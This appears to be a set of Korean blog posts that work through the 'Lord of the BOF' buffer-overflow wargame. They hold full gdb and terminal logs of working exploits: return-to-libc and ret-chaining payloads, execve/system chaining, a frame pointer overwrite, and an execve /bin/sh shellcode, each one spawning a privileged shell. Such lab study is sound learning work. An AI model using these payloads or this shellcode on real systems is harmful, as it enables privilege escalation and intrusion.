0xbffffbfc: 0x00000000 0x00000000 0x00000000 0x00000000

(gdb) x/40wx $esp-2000

0xbffff464: 0x4001797a 0x08048581 0x25000000 0x00000000

0xbffff474: 0x00000001 0x00000000 0x40014353 0x000ed000

0xbffff484: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff494: 0x00000000 0x40018000 0x0000005e 0xbfffe3fc

0xbffff4a4: 0xbfffe400 0xbfffe404 0xbfffe408 0xbfffe40c

0xbffff4b4: 0xbfffe410 0xbfffe548 0x00000000 0x00000000

0xbffff4c4: 0x00002fb2 0x00001000 0x00000018 0x535975ed

0xbffff4d4: 0x0000385c 0x400143e0 0x00000018 0x000ed9c0

0xbffff4e4: 0x00000002 0xbfffe414 0xbfffe3e4 0xbfffe45c

0xbffff4f4: 0x00001000 0xbfffe45c 0x00000003 0x000f485c

(gdb)

0xbffff504: 0xbfffe530 0xbfffe490 0x40013ed0 0x00000808

0xbffff514: 0x00000000 0x00000000 0x0000675b 0x000081a4

0xbffff524: 0x00000001 0x00000000 0x00000000 0x00000808

0xbffff534: 0x00000000 0x00000000 0x40001402 0xbffff610

0xbffff544: 0x400081e6 0x400013e1 0x400013e1 0x40013868

0xbffff554: 0x400013a5 0x20730824 0xffffffff 0xffffffcf

0xbffff564: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff574: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff584: 0xbffffab0 0x00000000 0xbffff614 0x40000814

0xbffff594: 0x00000052 0x00000000 0x00000000 0x00000001

(gdb) x/40wx $esp-500

0xbffffa40: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffa50: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffa60: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffa70: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffa80: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffa90: 0x00000000 0x40029b0e 0xbffff8f4 0x400081e6

0xbffffaa0: 0x40029ad5 0x40029ad5 0x40013868 0x400143e0

0xbffffab0: 0x00006805 0x00000203 0x00000203 0x00000203

0xbffffac0: 0x00000006 0x08048034 0x08048390 0xbffff87c

0xbffffad0: 0x40002179 0x00006120 0x4000220c 0x08048390

(gdb)

0xbffffae0: 0x00000000 0x00000000 0x40020e90 0x00000612

0xbffffaf0: 0x40021fd0 0x4001ad70 0x400143e0 0x00000003

0xbffffb00: 0x40014650 0x00000001 0xbffff8ac 0x00000000

0xbffffb10: 0x4003ec68 0x00000000 0x00000000 0x00000000

0xbffffb20: 0x40029b0e 0xbffff8f4 0x400081e6 0x40029ad5

0xbffffb30: 0x40029ad5 0x40013868 0x400143e0 0x00006805

0xbffffb40: 0x00000203 0x00000203 0x00000203 0x00000006

0xbffffb50: 0x08048034 0x08048390 0xbffff87c 0x40002179

0xbffffb60: 0x00006120 0x4000220c 0x08048390 0x00000000

0xbffffb70: 0x00000000 0x40020e90 0x00000612 0x40021fd0

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "AAAA"'`

AAAA@BBBBù¿@(ü ¿AAAA

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@(ü ¿AAAA'.

Program terminated with signal 11, Segmentation fault.

#0 0x41414141 in ?? ()

(gdb) x/60wx $esp-60

0xbffffaa4: 0x080484dc 0x0804857e 0xbffffab0 0x41414141

0xbffffab4: 0x40058ae0 0x42424242 0x400fbff9 0x90909090

0xbffffac4: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffad4: 0x90909090 0xbffffc28 0x41414141 0x00000002

0xbffffae4: 0xbffffb24 0xbffffb30 0x40013868 0x00000002

0xbffffaf4: 0x08048390 0x00000000 0x080483b1 0x08048440

0xbffffb04: 0x00000002 0xbffffb24 0x080482e4 0x0804851c

0xbffffb14: 0x4000ae60 0xbffffb1c 0x40013e90 0x00000002

0xbffffb24: 0xbffffc16 0xbffffc28 0x00000000 0xbffffc59

0xbffffb34: 0xbffffc6c 0xbffffc84 0xbffffca3 0xbffffcc5

0xbffffb44: 0xbffffcd3 0xbffffe96 0xbffffeb5 0xbffffed3

0xbffffb54: 0xbffffee8 0xbfffff08 0xbfffff13 0xbfffff24

0xbffffb64: 0xbfffff2c 0xbfffff36 0xbfffff46 0xbfffff54

0xbffffb74: 0xbfffff62 0xbfffff73 0xbfffff7e 0xbfffff92

0xbffffb84: 0xbfffffd6 0x00000000 0x00000003 0x08048034

(gdb) x/wx 0xbffffaaf

0xbffffaaf: 0x414141bf

(gdb) x/wx 0xbffffaae

0xbffffaae: 0x4141bfff

(gdb) x/wx 0xbffffab1

0xbffffab1: 0xe0414141

(gdb) x/wx 0xbffffab0

0xbffffab0: 0x41414141

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$ q

sh: q: command not found

bash$ exit

exit

Segmentation fault (core dumped)

[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$ my-pass

euid = 516

*) Libc에서 /bin/sh를 찾아 사용하였는데 찾는 소스는 여기서 얻어온거에여.

<http://www.win.tue.nl/~aeb/linux/hh/hh-10.html>

-해당 소스-

[assassin@localhost assassin]$ cat foo.c

main(){

char *p;

p = 0x4002c000;

while (1) {

while (*p++ != '/') ;

if (strcmp(p-1, "/bin/sh") == 0) {

printf("0x%08x\n", p-1);

return 0;

}

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

zombie_assassin->succubus (0)	2014.07.08
assassin->zombie_assassin (2)	2014.06.26
giant->assassin (0)	2014.04.22
bugbear->giant(1) (0)	2014.04.16
darkknight->bugbear (2)	2014.04.07

오오.. 이번엔 뻥뚫리게 속시원하게 풀렸네여..

~~strace못쓰겟슴다.. 우선 사용방법부터 공부해야겠어여 써봤는데 해독을 못하게씀.. 무엇이 무엇인고~~

[giant@localhost giant]$ ls

assassas assassin assassin.c core

[giant@localhost giant]$ cat assassin.c

/*

The Lord of the BOF : The Fellowship of the BOF

- assassin

- no stack, no RTL

*/

#include <stdio.h>

#include <stdlib.h>

main(int argc, char *argv[])

{

char buffer[40];

if(argc < 2){

printf("argv error\n");

exit(0);

}

if(argv[1][47] == '\xbf')

{

printf("stack retbayed you!\n");

exit(0);

}

if(argv[1][47] == '\x40')

{

printf("library retbayed you, too!!\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer+sfp hunter

memset(buffer, 0, 44);

}

/*소스를 보게되면 retbayed you라 하는데 이게 힌트같아보입니다. 잘 분석해보면 ret만 남습니다. ret는 변조할 수 있는것이죠! 근데 library에 들어있는 함수도 못쓰고 스택에 있는것도 못씁니다.. (막막)*/

[giant@localhost giant]$gdb -q

(gdb) p 0xbfffffff-0xbeffffff

$1 = 16777216

(gdb) zz

Undefined command: "zz". Try "help".

(gdb) q

[giant@localhost giant]$ ./assassas `perl -e 'print "A"x16777216'`

bash: ./assassas: Argument list too long // 꼼수시도해보려다가 망함ㅋ될리가 없죠..

[giant@localhost giant]$ [a]x44, [ret func]4bytes, [ret]<-system, [dummy], [/bin/sh]

bash: -system,: No such file or directory

[giant@localhost giant]$ bash2

[giant@localhost giant]$ gdb -q assassas

(gdb) b main

Breakpoint 1 at 0x8048476

(gdb) r

Starting program: /home/giant/assassas

Breakpoint 1, 0x8048476 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running. Exit anyway? (y or n) y

[giant@localhost giant]$ export BINSH=/bin/sh

[giant@localhost giant]$ vi whereis.c

[giant@localhost giant]$ gcc whereis.c -o getenv

whereis.c: In function `main':

whereis.c:5: warning: assignment makes pointer from integer without a cast

[giant@localhost giant]$ ./getenv BINSH

env is at: 0xbffffc88

[giant@localhost giant]$ ./assassas `perl -e 'print "A"x44, "\xff\xff\xff\xff", "\xe0\x8a\x05\x40", "B"x4, "\x88\xfc\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA @BBBBü ¿

Segmentation fault (core dumped)

[giant@localhost giant]$ gdb -q assassas core

Core was generated by `./assassas AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA @BBBBü ¿'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xffffffff in ?? ()

(gdb) disas main

Dump of assembler code for function main:

0x8048470 <main>: push %ebp

0x8048471 <main+1>: mov %esp,%ebp

0x8048473 <main+3>: sub $0x28,%esp

0x8048476 <main+6>: cmpl $0x1,0x8(%ebp)

0x804847a <main+10>: jg 0x8048493 <main+35>

0x804847c <main+12>: push $0x8048570

0x8048481 <main+17>: call 0x8048378 <printf>

0x8048486 <main+22>: add $0x4,%esp

0x8048489 <main+25>: push $0x0

0x804848b <main+27>: call 0x8048388 <exit>

0x8048490 <main+32>: add $0x4,%esp

0x8048493 <main+35>: mov 0xc(%ebp),%eax

0x8048496 <main+38>: add $0x4,%eax

0x8048499 <main+41>: mov (%eax),%edx

0x804849b <main+43>: add $0x2f,%edx

0x804849e <main+46>: cmpb $0xbf,(%edx)

0x80484a1 <main+49>: jne 0x80484c0 <main+80>

0x80484a3 <main+51>: push $0x804857c

0x80484a8 <main+56>: call 0x8048378 <printf>

0x80484ad <main+61>: add $0x4,%esp

0x80484b0 <main+64>: push $0x0

0x80484b2 <main+66>: call 0x8048388 <exit>

0x80484b7 <main+71>: add $0x4,%esp

0x80484ba <main+74>: lea 0x0(%esi),%esi

0x80484c0 <main+80>: mov 0xc(%ebp),%eax

0x80484c3 <main+83>: add $0x4,%eax

0x80484c6 <main+86>: mov (%eax),%edx

0x80484c8 <main+88>: add $0x2f,%edx

---Type <return> to continue, or q <return> to quit---

0x80484cb <main+91>: cmpb $0x40,(%edx)

0x80484ce <main+94>: jne 0x80484e7 <main+119>

0x80484d0 <main+96>: push $0x8048591

0x80484d5 <main+101>: call 0x8048378 <printf>

0x80484da <main+106>: add $0x4,%esp

0x80484dd <main+109>: push $0x0

0x80484df <main+111>: call 0x8048388 <exit>

0x80484e4 <main+116>: add $0x4,%esp

0x80484e7 <main+119>: mov 0xc(%ebp),%eax

0x80484ea <main+122>: add $0x4,%eax

0x80484ed <main+125>: mov (%eax),%edx

0x80484ef <main+127>: push %edx

0x80484f0 <main+128>: lea 0xffffffd8(%ebp),%eax

0x80484f3 <main+131>: push %eax

0x80484f4 <main+132>: call 0x80483a8 <strcpy>

0x80484f9 <main+137>: add $0x8,%esp

0x80484fc <main+140>: lea 0xffffffd8(%ebp),%eax

0x80484ff <main+143>: push %eax

0x8048500 <main+144>: push $0x80485ae

0x8048505 <main+149>: call 0x8048378 <printf>

0x804850a <main+154>: add $0x8,%esp

0x804850d <main+157>: push $0x2c

0x804850f <main+159>: push $0x0

0x8048511 <main+161>: lea 0xffffffd8(%ebp),%eax

0x8048514 <main+164>: push %eax

0x8048515 <main+165>: call 0x8048398 <memset>

0x804851a <main+170>: add $0xc,%esp

0x804851d <main+173>: leave

0x804851e <main+174>: ret

---Type <return> to continue, or q <return> to quit---q

(gdb) q

[giant@localhost giant]$ ./assassas `perl -e 'print "A"x44, "\x1e\x85\x04\x08", "\xe0\x8a\x05\x40", "B"x4, "\x88\xfc\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@BBBBü ¿

sh: /sh: No such file or directory

Segmentation fault (core dumped)

[giant@localhost giant]$ ./assassas `perl -e 'print "A"x44, "\x1e\x85\x04\x08", "\xe0\x8a\x05\x40", "B"x4, "\x84\xfc\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@BBBBü ¿

bash$ exit

exit

Segmentation fault (core dumped)

[giant@localhost giant]$ ./assassin `perl -e 'print "A"x44, "\x1e\x85\x04\x08", "\xe0\x8a\x05\x40", "B"x4, "\x84\xfc\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@BBBBü ¿

bash$ my-pass

euid = 515

지난번에 했던걸 응용(?)했다해야하나.. 전단계에 execve를 썼던건 실패해도 ret로 돌아가 다음 명령을 실행할 수 있어서 였는데 라이브러리 함수를 못쓰게 되니까 (당황->고민->멍때리는 시간을 거쳤..)생각해보니 팝콘형님이 비슷한 얘기를 해주신 적 있습니다. ret에 ret주소를 넣게되면 (ret= pop eip) eip가 pop되기도 하지만, pop라는 뜻은 esp도 4바이트 늘어난다는 뜻이기 때문에 다음 명령을 가르키고 있게 됩니다. 그 자리에 system함수의 주소를 넣고 4바이트 더미를 또 넣은 후 /bin/sh의 주소를 넣게되면 전 단계의 rtl과 같이 동작하게 됩니다.

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

assassin->zombie_assassin (2)	2014.06.26
assassin->zombie_assassin (0)	2014.05.13
bugbear->giant(1) (0)	2014.04.16
darkknight->bugbear (2)	2014.04.07
golem->darkknight (0)	2014.04.06

네, 음

어..(충격먹음)

후...

어렵네여ㅎ..

로그가 좀 정신없으니 엔터로 정리해놓겠슴다.

이번에 풀면서 잡담나눠주시고 지식이랑 새로운 해낑기법들을 맛보게(?)해주시고 이해를 도와주신 popopret형께 감사드려요 :D [(http://netstat.tistory.com) ☜☜여러가지 자료가 엄청많은 짱짱블러그ㄱㄱ]

[bugbear@localhost bugbear]$ ls

assassas core ggggg ggggg.c giant giant.c grant grant.c grantz /*계속 복사본은 권한이 없어서 에러가 떠서 grantz로 연결하게 grant.c를 수정했는데 필요없는짓이었슴여.. 바꾸던 안바꾸던 execve의 주소는 같슴다..ㄸㄹㄹ*/

[bugbear@localhost bugbear]$ payload= [/bin//sh, "\x90" x40] [execve addr] [dummy x4] [/bin//sh] [&/bin//sh] [null]

[1] 807

bash2: [/bin//sh,: No such file or directory

bash2: /bin//sh]: No such file or directory

[1]+ Exit 127 payload= [/bin//sh, "\x90" x40] [execve addr] [dummy x4] [/bin//sh] [

[bugbear@localhost bugbear]$ vi whereis.c

[bugbear@localhost bugbear]$ gcc whereis.c -o whereis

whereis.c: In function `main':

whereis.c:5: warning: assignment makes pointer from integer without a cast

[bugbear@localhost bugbear]$ export BINSH=`perl -e 'print "/bin/sh"'`

[bugbear@localhost bugbear]$ ./whereis BINSH

the env is at: 0xbffffc75

[bugbear@localhost bugbear]$ payload= [binsh addr] [nullx4] [nopx36] [execve] [dummy] [binsh addr] [argv[1]addr] [null addr]

bash2: [binsh: command not found

[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x75\xfc\xff\xbf", "\x00"x4, "\x90"x36, "\x48\x9d\x0a\x40", "AAAA", "\x75\xfc\xff\xbf", "\xf8\xfb\xff\xbf", "0x51\xfb\xff\xbf"')"

You must use execve!

[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x75\xfc\xff\xbf", " "x4, "\x90"x36, "\x48\x9d\x0a\x40", "AAAA", "\x75\xfc\xff\xbf", "\xf8\xfb\xff\xbf", "0x51\xfb\xff\xbf"')"

uü ¿ H

@AAAAuü ¿øû ¿0x51û ¿

Segmentation fault (core dumped) /*여기서 체감한 사실: null은 argv[1]에 들어가지 않습니다. 허허*/

[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x75\xfc\xff\xbf", "\xff"x4, "\x90"x36, "\x48\x9d\x0a\x40", "AAAA", "\x75\xfc\xff\xbf", "\xf8\xfb\xff\xbf", "0x51\xfb\xff\xbf"')"

uü ¿ H

@AAAAuü ¿øû ¿0x51û ¿

Segmentation fault (core dumped)

[bugbear@localhost bugbear]$ gdb -q `perl -e 'print "\x75\xfc\xff\xbf"'` core

Core was generated by `./uü ¿ H

@AAAAuü ¿øû ¿0x51û ¿'. /*그래서 우선 지금은 argv[0]으로도 시도 해 봤는데 아직은 방법을 잘 모르겠는거 같아서 어제 p0p0pret 형이 알려주신 방법을 사용했습니다. (꼼수)*/

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0x41414141 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048566

(gdb) r

Starting program: /home/bugbear/uü ¿

Breakpoint 1, 0x8048566 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running. Exit anyway? (y or n) y

[bugbear@localhost bugbear]$ ./`perl -e 'print "\x75\xfc\xff\xbf"'` "$(perl -e 'print "\x90"x44, "\x48\x9d\x0a\x40", "\xe0\x8a\x05\x40", "AAAA", "\x75\xfc\xff\xbf"')"

H

@@AAAAuü ¿

Segmentation fault (core dumped)

(중략...)

[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x90"x44, "\x48\x9d\x0a\x40", "\xe0\x8a\x05\x40", "\x75\xfc\xff\xbf", "\x78\xfc\xff\xbf"')"

H

@@uü ¿xü ¿

sh: =/bin/sh: No such file or directory

Segmentation fault (core dumped)

[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x90"x44, "\x48\x9d\x0a\x40", "\xe0\x8a\x05\x40", "\x75\xfc\xff\xbf", "\x79\xfc\xff\xbf"')"

H

@@uü ¿yü ¿

bash$ exit

exit

Segmentation fault (core dumped)

[bugbear@localhost bugbear]$ ./giant "$(perl -e 'print "\x90"x44, "\x48\x9d\x0a\x40", "\xe0\x8a\x05\x40", "\x75\xfc\xff\xbf", "\x79\xfc\xff\xbf"')"

H

@@uü ¿yü ¿

bash$ whoami

giant

bash$ my-pass

euid = 514

방법 설명: 원래 정석은 rtl로 execve에 인자를 다 전달해줌으로써 권한을 갖게 되는 거에여. 근데 rtl 기법을 봅시다.

[buffer] [sfp] [ret(function)] [dummy] [argument] [argument2] [argument3]... 이런 형식이 있다면

[nop~~~~~~][execve~~~~][system] [execve arg][system arg] -- 이 형태로 페이로드를 짜야 합니다.

이렇게 하면 execve함수를 호출하긴 하는데 인자가 제대로 없어서 실행은 성공적으로 되지 않습니다(원래 execve의 인자는 3개이지만 여기선 하나밖에 없습니다). 그래도 프로그램은 계속 실행해 원래는 더미(또는 exit)로 넣어두었던 곳의 ret를 참조하게 되는데요, 여기서 원래는 ret를 참조해 프로그램을 종료하게 되지만 이 페이로드의 경우에서는 종료되지 않고 system을 다시 호출하게 됩니다(ret자리에 system함수의 주소가 있으니까요). 그러면 또 system에 있는 인자를 system+4있는곳에서 찾게 될 것이구요. 그러면 system함수에 system함수의 인자(/bin/sh주소)까지 제대로 들어가 system("/bin/sh")를 실행하게 됩니다. 고로 결과는 쉘을 띄웁니다!(꼼수꼼수)

다른 풀이를 보니 음 으음 뭔지 이해는 되는거같은데 지금하기엔 어려운거같아요. 이해가 다 안되는데 한다는것도 그렇고,.. 계속 삽질해봐야겠네여.

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

assassin->zombie_assassin (0)	2014.05.13
giant->assassin (0)	2014.04.22
darkknight->bugbear (2)	2014.04.07
golem->darkknight (0)	2014.04.06
skeleton->golem (5)	2014.03.17

허헣

rtl풀리니까 기분좋네여. 좀 처음에 헤매긴 했는데 잘되서 기분좋습니다!

login: darkknight

Password:

Last login: Sun Mar 16 07:20:14 from 192.168.10.1

[darkknight@localhost darkknight]$ ls -al

total 44

drwx------ 2 darkknig darkknig 4096 Mar 29 2010 .

drwxr-xr-x 25 root root 4096 Mar 30 2010 ..

-rw-r--r-- 1 darkknig darkknig 24 Mar 2 2010 .bash_logout

-rw-r--r-- 1 darkknig darkknig 230 Mar 2 2010 .bash_profile

-rw-r--r-- 1 darkknig darkknig 124 Mar 2 2010 .bashrc

-rwxr-xr-x 1 darkknig darkknig 333 Mar 2 2010 .emacs

-rw-r--r-- 1 darkknig darkknig 3394 Mar 2 2010 .screenrc

-rwsr-sr-x 1 bugbear bugbear 12043 Mar 8 2010 bugbear

-rw-r--r-- 1 root root 385 Mar 29 2010 bugbear.c

[darkknight@localhost darkknight]$ cat bugbear.c

/*

The Lord of the BOF : The Fellowship of the BOF

- bugbear

- RTL1

*/

#include <stdio.h>

#include <stdlib.h>

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n");

exit(0);

}

if(argv[1][47] == '\xbf') //이젠 아예 0xbf~주소를 못쓰게 됩니다.

{

printf("stack betrayed you!!\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

}

[darkknight@localhost darkknight]$ cp bugbear bugbeer

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x48'`

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ gdb -q bugbeer core

Core was generated by `./bugbeer '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0x90909090 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048436

(gdb) r

Starting program: /home/darkknight/bugbeer

Breakpoint 1, 0x8048436 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running. Exit anyway? (y or n) y

[darkknight@localhost darkknight]$ payload= nopx44, system, dummy, argument

bash: nopx44,: command not found

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "BBBB"'`

@AAAABBBB

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ export ARG=`perl -e 'print "\x90"x10, "/bin/sh"'`

[darkknight@localhost darkknight]$ ./env ARG

ARG: 0xbffffc9d

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9d\xfc\xff\xbf"'`

@AAAAü ¿

sh: /bin/sh: No such file or directory

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9e\xfc\xff\xbf"'`

@AAAAü ¿

sh: /bin/sh: No such file or directory

Segmentation fault (core dumped) //쵸콤 게싱....해써요..ㅋ

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9f\xfc\xff\xbf"'`

@AAAAü ¿

bash$ exit

exit

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9f\xfc\xff\xbf"'`

@AAAAü ¿

bash$ my-pass

euid = 513

와앙ㅇ와앎ㄴㅇㄹㅁㅇㄴㄹㅋㅋ

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

giant->assassin (0)	2014.04.22
bugbear->giant(1) (0)	2014.04.16
golem->darkknight (0)	2014.04.06
skeleton->golem (5)	2014.03.17
vampire->skeleton (2)	2014.02.25

어제 golem을 푸는데에 사용한 frame pointer overwrite에 대해 간단하게 아는만큼만 쓰려고 합니다.

#include <stdio.h>

#include <stdlib.h>

void problem_child(char *src)

{

char buffer[40];

strncpy(buffer, src, 41);

printf("%s\n", buffer);

}

main(int argc, char *argv[])

{

if(argc<2){

printf("argv error\n");

exit(0);

}

problem_child(argv[1]);

}

이 소스를 한번 뜯어봅시다.

void problem_child(char *src)

{

char buffer[40];

strncpy(buffer, src, 41);

printf("%s\n", buffer);

}

-> buffer는 40바이트밖에 없는 반면, strncpy에서는 src에서 buffer으로 41바이트를 복사합니다.

(low)[buffer] [sfp] [ret](high) 가 있다 함은,(함수의 인자가 어떤 형식으로 스택에 보내지는지는 모르겠습니다) 41바이트를 복사하기 때문에 buffer를 지나 sfp 한 바이트를 변조 할 수 있는 것이죠.

problem_child의 sfp에는 후에 메인 함수로 복귀하기 위해 main 함수의 sfp전의 주소가 저장되어 있게 됩니다. 후에 실행할 명령이 더이상 없기 때문이죠.

이 함수의 leave 명령을 하게 되면,

leave:

mov ebp, esp

pop ebp

이 명령들에 의해 esp를 ebp가 있는 곳(sfp가 있는 곳)으로 이동시키고, pop ebp를 하여 ebp를 복귀시키며 동시에 esp에도 4를 더하게 됩니다.(여기서 알고있어야 하는것은 sfp에 있던 값이 변조된 값이라 sfp를 참고한 ebp는 메인으로 복귀하지 않고 이상한 곳으로 날아갔다는 점입니다. 이걸 악이용해 해커는 ebp가 원하는 곳으로 가게끔 변조할 수 있습니다.)

leave 후 ret 명령이 실행되는데요(모두 problem_child안에서 일어나고 있습니다), 이것은 eip에 ret(ebp+4)에 저장되어있는 주소를 넣어 후에 실행할 코드의 주소를 알려주게 됩니다. 여기서, ebp는 현재 변조된 sfp에 의해 이상한 주소로 날아가 있기 때문에, 그 주소에서부터 4바이트를 읽어들여 eip에 넣게 됩니다. 결과적으로 이상한 곳에 있는 이상한 데이터를 eip에 넣게 되는 것입니다.

어제 풀 때 사용한 노트를 보면,

argv[1] = [one of the nopsled's addr] [nopsled] [shellcode] [the byte that overflows the fp]

has to equal 41bytes

라는 내용이 있습니다.

fp는 메인함수를 가르키고 있기 때문에 주소값의 앞 6자리는 같았습니다. 그 후, 우리가 사용할 수 있는 공간은 argv[1]이었기 때문에 fp를 변조해 ebp가 argv[1]-4의 주소를 가리키고 있게 하였습니다. argv[1]은 위에 구성한 것처럼 앞의 4바이트가 ret로 인해 읽혀야 하니 주소값을 넣어야 합니다. 고로, 앞의 4바이트는 뒤에 넣은 nopsled중 한 곳을 가리키게 하였습니다. ret가 실행된 후 nopsled를 타고 쉘코드가 실행되게 할 수 있기 위함이죠. strncpy에서 41바이트가 복사되어야 하니 마지막 바이트는 fp를 변조할 값을 넣었습니다. 이렇게 해서 leave에서 변조된 ebp가 &(argv[1])-4로 점프하고, pop esp로 esp는 problem_child 의 ret명령을 실행하고, ebp는 4바이트 늘어난 뒤 ret를 가리키는줄 알고 argv[1]의 첫 4바이트를 eip에 넣게 됩니다. 그러면 eip는 그 주소(이 경우 nopsled)로 점프하여 그 후 나오는 명령, (여기선 쉘코드)를 결과적으로 실행하게 됩니다.

fpo가 메인함수에서 안되는 이유는 모르겠지만, 제 생각으로는 타 함수들은 메인으로 돌아가기 위해 sfp를 주소 복구용으로 사용하는 반면, 메인 함수는 ~~돌아가야 할 주소가 필요 없기 때문에 메인함수에서는 실행이 안되는것 같습니다.~~ 메인 함수는 _libc_start_main으로 돌아가야하죠.. 없는 디버깅 실력을 모아 메인 함수를 따라가 봤는데, sfp가 있는 곳에는 0x00000000이 있드라구여. 그 후에 있는 ret 주소는 start함수를 가르키고 있었는데.. 워낙 디버깅 실력이 없어서 더는 못찾아봤어요.ㅋㅋ..

이거 쓰고보니 한국어 참 어렵네요.. 뭔가 설명이 오묘하다.

http://research.hackerschool.org/Datas/Research_Lecture/sfp.txt

꼭 참고하시기 바랍니다 :)

저작자표시

'STUDY > Documentation' 카테고리의 다른 글

strace, 제가 한번 사용해 보겠습니다. (0)	2014.07.22
Buffer Overflow (3)	2014.05.18
Key File (0)	2014.05.16
[CodeGate Junior Quals] RunCommand 250 (0)	2014.04.06
MISCCCCCCCCCC! (0)	2014.03.11

와나..

http://research.hackerschool.org/Datas/Research_Lecture/sfp.txt

이거 읽으세요. 바로 이해감.

와...

와ㅏ...

밤샌 보람이 있는데요?!

/*

The Lord of the BOF : The Fellowship of the BOF

- darkknight

- FPO

*/

#include <stdio.h>

#include <stdlib.h>

void problem_child(char *src)

{

char buffer[40];

strncpy(buffer, src, 41); /*strncpy(dest, source, #of bytes)- argv[1]에서 버퍼로 41바이트를 복사한다. 버퍼는 40바이트인데, 그래서 뒤에 있는 한 바이트가 이 함수에서 메인함수로 돌아갈 때 사용하는 스택프레임 포인터를 오버플로우하게 된다*/

printf("%s\n", buffer);

}

main(int argc, char *argv[])

{

if(argc<2){

printf("argv error\n");

exit(0);

}

problem_child(argv[1]);

}

[golem@localhost golem]$ ./porkknight `perl -e 'print "\x90\xfc\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x86"x2'`

ü ¿j

XRh//shh/binRSÍ̀ú ¿Mü ¿û ¿ @

Segmentation fault (core dumped)

[golem@localhost golem]$ gdb -q porkknight core

Core was generated by `./porkknight ü ¿j

XRh//shh/binRSÍ̀'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xfc764000 in ?? ()

(gdb) x/40wx $esp

0xbffffa8e: 0xfaecbfff 0xd920bfff 0x43e04005 0xfab44001

0xbffffa9e: 0x6070bfff 0x69804006 0x85004010 0xfac40804

0xbffffaae: 0x81ecbfff 0xfaec4010 0x8466bfff 0x85000804

0xbffffabe: 0xfac40804 0xfc90bfff 0x9090bfff 0x90909090 //여기보면 argv[1]

0xbfffface: 0x90909090 0x6a909090 0x5299580b 0x732f2f68

0xbffffade: 0x622f6868 0xe3896e69 0xe1895352 0xfa8680cd

0xbffffaee: 0x849ebfff 0xfc4d0804 0xfb18bfff 0x09cbbfff

